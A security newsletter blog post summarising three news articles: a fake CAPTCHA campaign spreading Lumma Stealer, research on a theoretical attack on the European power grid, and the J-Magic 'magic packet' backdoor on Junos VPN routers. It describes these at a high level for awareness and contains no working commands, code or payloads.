In this week's edition, we strive for simplicity not because we have simple articles to review (in fact, it's the reverse) but because we have three articles to review. Don't worry that does not mean that you're not going to learn anything; you will. Moreover, two of the articles are technical and might force you to read them twice when you aim to make sense of it all.
Beware: Fake CAPTCHA Campaign Spreads Lumma Stealer in Multi-Industry Attacks
The article's title is a clear warning that any techy will heed. However, a non-technical person, might fall victim and unknowingly install malware on their computer. Reading this should urge you and me to educate our families and friends on such a threat. We might put it as such: Ignore any website that instructs you to open any application on your computer. If you don't listen, hackers can steal your personal information.
From the article:
The attack chain begins when a victim visits a compromised website, which directs them to a bogus CAPTCHA page that specifically instructs the site visitor to copy and paste a command into the Run prompt in Windows that uses the native mshta.exe binary to download and execute an HTA file from a remote server.
It's worth noting that a previous iteration of this technique, widely known as ClickFix, involved the execution of a Base64-encoded PowerShell script to trigger the Lumma Stealer infection.
Researchers say new attack could take down the European power grid
Based on the article, experts with knowledge about power grids are doubtful about the reality of such an attack. Nonetheless, it seems it was interesting research for the researchers and if you have a minute or two, you can feel the same.
From the article:
The researchers surveyed the grid to measure the capacity of power that small- and medium-sized renewable facilities could feed into the grid. They arrived at the estimate of 40 GW.
Combined with the 20 GW of load they theoretically can add, that amounted to an unbalanced capacity of 60 GW, enough to power roughly all of Germany.
They posited that a sudden change that added or ditched that amount of electricity from the grid all at once could create enough instability to take it down entirely.
Backdoor infecting VPNs used “magic packets” for stealth and security
The folks at Arstechnica dubbed the backdoor as a completely invincible backdoor. After reading the article, you would not be surprised that the title is befitting. Here is a quick summary: the backdoor silently waits for the magic packet in a normal TCP traffic and responds with a challenge and the initiating party must respond provided that they have the secret key.
From the article:
The combination of targeting Junos OS routers that serve as a VPN gateway and deploying a passive listening in-memory only agent, makes this an interesting confluence of tradecraft worthy of further observation.”
The researchers found J-Magic on VirusTotal and determined that it had run inside the networks of 36 organizations. They still don’t know how the backdoor got installed
Credits
Cover photo by Debby Hudson on Unsplash.
That's it for this week, and I'll see you next time.
Top comments (0)